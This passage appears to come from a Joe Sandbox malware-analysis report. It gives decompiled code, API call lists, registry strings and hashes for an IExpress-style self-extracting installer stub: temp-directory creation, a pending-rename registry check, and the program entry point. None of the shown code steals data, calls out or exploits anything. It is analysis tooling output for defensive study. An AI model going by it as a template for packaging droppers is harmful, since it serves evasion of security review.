                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-957705000
                                                                                                                                                                                                                                            • Opcode ID: 00eab83174fa5fc82fa059eafbcf4393475865c611cee009f54083f02be588bb
                                                                                                                                                                                                                                            • Instruction ID: abaa61c050ee2552685ada6e26d581ffec6f76a0693b5b10d4cb21719ed560c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00eab83174fa5fc82fa059eafbcf4393475865c611cee009f54083f02be588bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43110172B0060C67E320DF76AC49FEF366EEBD1311F000125B646D21D0CE7489878AA6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph (function 00A05467; legend: Executed / Not Executed)
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A05467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0xa091e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A01680(0xa091e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E00A058C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00A06CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E00A0597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0xa08a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa08a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E00A053A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0xa091e4;
                                                                                                                                                                                                                                            				E00A01781(0xa091e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0xa09a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A0658A(_t48, 0x104, 0xa01140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E00A0658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A054C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0556F
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A053FB
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05402
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0541F
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0542B
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-772166365
                                                                                                                                                                                                                                            • Opcode ID: a15611ae2e646cfb90295907628e7d223f09b58d560e01823bf0985480b828ed
                                                                                                                                                                                                                                            • Instruction ID: bacde210a15c61f547098156e908ea83aad5030bf01800593e5c40104b15fba7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a15611ae2e646cfb90295907628e7d223f09b58d560e01823bf0985480b828ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A231E371F00A0C6BCB149FB9BD449BF77ABAB95344F04022AA842965D1DB74DE038E95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 a0256d-a0257d 564 a02622-a02627 call a024e0 563->564 565 a02583-a02589 563->565 570 a02629-a0262f 564->570 567 a025e8-a02607 RegOpenKeyExA 565->567 568 a0258b 565->568 571 a025e3-a025e6 567->571 572 a02609-a02620 RegQueryInfoKeyA 567->572 569 a02591-a02595 568->569 568->570 569->570 574 a0259b-a025ba RegOpenKeyExA 569->574 571->570 575 a025d1-a025dd RegCloseKey 572->575 574->571 576 a025bc-a025cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A0256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E00A024E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A04096,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?), ref: 00A025B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?,00A04096), ref: 00A025CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A01ED3,00000001,00000000,?,?,00A04137,?,00A04096), ref: 00A025DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A04096,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?), ref: 00A025FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A04096,00000000,00000000,00000000,00000000,?,00A01ED3,00000001,00000000), ref: 00A0261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A025F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A025C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A025A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 5ad11c906bc96d2e3147c72e2f8c71b9a0926c5b6fca53d364e6bbe115f7fabb
                                                                                                                                                                                                                                            • Instruction ID: 6ecf4514ce3054502fdf59e016f98f7acda3ae73db34d2788d3656b6ab8953a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ad11c906bc96d2e3147c72e2f8c71b9a0926c5b6fca53d364e6bbe115f7fabb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23118F35A0232CBBEF20DB91AC1DEFBBE7CEF117A1F104155B809A2080D6355E4AD7A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 577 a06a60-a06a91 call a07155 call a07208 GetStartupInfoW 583 a06a93-a06aa2 577->583 584 a06aa4-a06aa6 583->584 585 a06abc-a06abe 583->585 586 a06aa8-a06aad 584->586 587 a06aaf-a06aba Sleep 584->587 588 a06abf-a06ac5 585->588 586->588 587->583 589 a06ad1-a06ad7 588->589 590 a06ac7-a06acf _amsg_exit 588->590 592 a06b05 589->592 593 a06ad9-a06ae9 call a06c3f 589->593 591 a06b0b-a06b11 590->591 595 a06b13-a06b24 _initterm 591->595 596 a06b2e-a06b30 591->596 592->591 597 a06aee-a06af2 593->597 595->596 598 a06b32-a06b39 596->598 599 a06b3b-a06b42 596->599 597->591 600 a06af4-a06b00 597->600 598->599 601 a06b44-a06b51 call a07060 599->601 602 a06b67-a06b71 599->602 604 a06c39-a06c3e call a0724d 600->604 601->602 613 a06b53-a06b65 601->613 603 a06b74-a06b79 602->603 606 a06bc5-a06bc8 603->606 607 a06b7b-a06b7d 603->607 614 a06bd6-a06be3 _ismbblead 606->614 615 a06bca-a06bd3 606->615 610 a06b94-a06b98 607->610 611 a06b7f-a06b81 607->611 619 a06ba0-a06ba2 610->619 620 a06b9a-a06b9e 610->620 611->606 618 a06b83-a06b85 611->618 613->602 616 a06be5-a06be6 614->616 617 a06be9-a06bed 614->617 615->614 616->617 617->603 621 a06c1e-a06c25 617->621 618->610 622 a06b87-a06b8a 618->622 623 a06ba3-a06bbc call a02bfb 619->623 620->623 625 a06c32 621->625 626 a06c27-a06c2d _cexit 621->626 622->610 627 a06b8c-a06b92 622->627 623->621 630 a06bbe-a06bbf exit 623->630 625->604 626->625 627->618 630->606
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A07155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa072b8);
                                                                                                                                                                                                                                            				E00A07208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa088b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa088b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa081e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa088b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A06C3F(0xa010b8, 0xa010c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A06FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa088b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa010b4);
                                                                                                                                                                                                                                            							_push(0xa010ac);
                                                                                                                                                                                                                                            							L00A07202();
                                                                                                                                                                                                                                            							 *0xa088b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa088ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa088b4;
                                                                                                                                                                                                                                            						if( *0xa088b4 != 0 && E00A07060(_t71, 0xa088b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa088b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa0a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A02BFB(0xa00000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa081e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa081f8;
                                                                                                                                                                                                                                            							if( *0xa081f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa081e4;
                                                                                                                                                                                                                                            							if( *0xa081e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa081e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E00A0724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a06b83
                                                                                                                                                                                                                                            0x00a06b81
                                                                                                                                                                                                                                            0x00a06b94
                                                                                                                                                                                                                                            0x00a06b98
                                                                                                                                                                                                                                            0x00a06ba2
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06ba3
                                                                                                                                                                                                                                            0x00a06bab
                                                                                                                                                                                                                                            0x00a06bb0
                                                                                                                                                                                                                                            0x00a06bb5
                                                                                                                                                                                                                                            0x00a06bbc
                                                                                                                                                                                                                                            0x00a06bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06bbf
                                                                                                                                                                                                                                            0x00a06c1e
                                                                                                                                                                                                                                            0x00a06c25
                                                                                                                                                                                                                                            0x00a06c27
                                                                                                                                                                                                                                            0x00a06c2d
                                                                                                                                                                                                                                            0x00a06c2d
                                                                                                                                                                                                                                            0x00a06c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06bc5
                                                                                                                                                                                                                                            0x00a06bc5
                                                                                                                                                                                                                                            0x00a06bc8
                                                                                                                                                                                                                                            0x00a06bcc
                                                                                                                                                                                                                                            0x00a06bce
                                                                                                                                                                                                                                            0x00a06bce
                                                                                                                                                                                                                                            0x00a06bd1
                                                                                                                                                                                                                                            0x00a06bd3
                                                                                                                                                                                                                                            0x00a06bd3
                                                                                                                                                                                                                                            0x00a06bd6
                                                                                                                                                                                                                                            0x00a06bda
                                                                                                                                                                                                                                            0x00a06be1
                                                                                                                                                                                                                                            0x00a06be3
                                                                                                                                                                                                                                            0x00a06be5
                                                                                                                                                                                                                                            0x00a06be5
                                                                                                                                                                                                                                            0x00a06be6
